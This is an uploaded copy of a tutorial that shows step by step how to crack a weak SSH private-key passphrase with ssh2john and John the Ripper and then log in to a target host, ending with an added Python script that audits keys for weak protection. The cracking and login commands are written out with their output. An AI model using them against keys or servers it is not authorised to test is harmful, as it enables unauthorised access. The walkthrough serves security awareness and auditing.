
Crack SSH Private Key With John The Ripper - Codelivly

Uploaded by

enzobouraima
Crack SSH Private Key with John the Ripper
By Rocky, February 20, 2023

The passphrase on an SSH private key should not be mere decoration. Unfortunately, some people
think they will never lose their SSH private key and neglect to use a strong password.
In the guide 10 simple steps for a secure SSH we looked at the SSH (Secure Shell) protocol,
which is used for secure (encrypted) connections to remote computers and servers. It is used
not only to execute commands in the server's terminal but also to transfer files to and from
the server (e.g. with FileZilla) or even to transfer audio via ssh.
From the above you can see its "power" and how important it is to have a secure ssh.
Unfortunately, some do not realize the seriousness of the issue and suffer from the "will it
happen to me?" syndrome. Their servers become pawns of the FritzFrog botnet, a sophisticated
peer-to-peer (P2P) botnet that compromises SSH servers.
As for the SSH passphrase and what makes a strong password, you don't need special training:
three or four simple words joined by punctuation marks is a good and secure model for
passwords and passphrases.

source: https://xkcd.com/936/
Just make sure you remember the password. In the following scenario, we'll see what happens
if you haven't dealt with it in the first 10 minutes on a new server with basic security
settings, or if you managed to lose an SSH private key that you had protected with an easy
passphrase.

Install SSH2John on your computer


SSH2John is If you do not have the Jumbo version of John the Ripper installed, you will need
to download ssh2john from GitHub, as it is not included on Kali Linux. If you don’t have John
the Ripper installed, you can learn how to install it from its GitHub page.
We open a terminal and download it:

~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
--2020-09-01 12:26:03-- https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
HTTP request sent, waiting for response... 200 OK
Length: 7825 (7.6K) [text/plain]
Saving to: 'ssh2john.py'
ssh2john.py 100%[=======================>] 7.64K --.-KB/s in 0s

Now let’s crack the SSH private Key.

Crack the private key


All we need to do is run the ssh2john tool against the private key and redirect the results to a
new hash file using:

python ssh2john.py id_rsa > id_rsa.hash

Next, we'll use John the Ripper to crack the password. But first, we need a proper word list.
For the purposes of this guide, we will use a small one that has 100 words to show how to do
it in a simple way. Download it:
~# wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkweb2017-top100.txt

Now run John on Kali Linux as usual, feeding it the wordlist and hash file:
john --wordlist=darkweb2017-top100.txt id_rsa.hash

Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
1q2w3e4r5t (id_rsa)
Session completed

We can see that it recognized our password, but to be sure, let's use the --show option to
verify it:

john --show id_rsa.hash

id_rsa:1q2w3e4r5t
1 password hash cracked, 0 left

As you can see, even 1q2w3e4r5t, which to the untrained eye may seem hard to crack, is,
unfortunately for those who use it, just a matter of vocabulary: it is in the word list.

SSH access to the victim


With the key broken, all that remains is to use it against the target for which the particular key
is being used. Using the option -i in the SSH command, we can specify the private key to use
for authentication:
ssh -i id_rsa [email protected]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
[email protected]'s password

It won’t let us use the key if the permissions are too … loose. So all we have to do is set some
stricter permissions to use the private key:

chmod 400 id_rsa

Now we are able to connect. Then, we enter the password that we have cracked, and the message
shows that we are connected:

~# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Last login: Tue Sep 1 15:20:16 2020 from 10.10.10.1
luser@target:~$

Final Thoughts
In this short guide, we have seen how one can crack SSH passwords.
In most cases these attacks are carried out en masse and automatically, and SSH keys are
broken like lettuce leaves if we do not pay attention to the overall security of our system
and live under the illusion that we are safe because we run a Linux server. As you may have
read in Enough with the FUD about Linux security holes, security is not an end product but an
ongoing process.
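
A defender's check for the two weaknesses this guide relies on, as an added example (not code from the original article or from the John the Ripper project): it reports whether a private key file has a passphrase at all, which KDF and round count protect it, and whether its mode would trigger the permissions warning shown above. The function names and the header-only sample key are constructed for illustration.

```python
import base64, os, struct

MAGIC = b"openssh-key-v1\0"

def read_string(buf, off):
    """Read one SSH wire string: uint32 big-endian length, then the bytes."""
    (n,) = struct.unpack_from(">I", buf, off)
    if off + 4 + n > len(buf):
        raise ValueError("truncated key blob")
    return buf[off + 4:off + 4 + n], off + 4 + n

def audit_key_text(pem):
    """Report how the private key in `pem` is protected at rest."""
    lines = [l.strip() for l in pem.strip().splitlines()]
    if not lines or "PRIVATE KEY-----" not in lines[0]:
        return {"format": "unknown", "finding": "not a PEM private key"}
    if lines[0] != "-----BEGIN OPENSSH PRIVATE KEY-----":
        # Legacy PEM marks encryption with a Proc-Type header; its key
        # derivation is a single MD5 pass, so each guess is very cheap.
        if any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines):
            return {"format": "pem", "finding": "encrypted, single-pass MD5 KDF"}
        enc = "ENCRYPTED" in lines[0]  # PKCS#8 "ENCRYPTED PRIVATE KEY"
        return {"format": "pem", "finding": "encrypted" if enc else "NO passphrase"}
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(MAGIC):
        raise ValueError("bad openssh-key-v1 magic")
    cipher, off = read_string(blob, len(MAGIC))
    kdf, off = read_string(blob, off)
    opts, off = read_string(blob, off)
    if cipher == b"none":
        return {"format": "openssh", "finding": "NO passphrase"}
    rounds = None
    if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
        salt, pos = read_string(opts, 0)
        (rounds,) = struct.unpack_from(">I", opts, pos)
    return {"format": "openssh", "finding": "encrypted",
            "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}

def audit_file(path):
    """Audit a key file on disk, including the group/other permission bits."""
    with open(path) as fh:
        report = audit_key_text(fh.read())
    report["too_open"] = bool(os.stat(path).st_mode & 0o077)
    return report

def constructed_key(cipher, kdf, rounds):
    """Constructed sample: header fields only, no key material."""
    s = lambda b: struct.pack(">I", len(b)) + b
    opts = s(b"\0" * 16) + struct.pack(">I", rounds) if rounds else b""
    body = base64.b64encode(MAGIC + s(cipher) + s(kdf) + s(opts)).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"
```

A key reported with no passphrase or a low round count can be re-encrypted in place with ssh-keygen -p -a <rounds> -f <keyfile>.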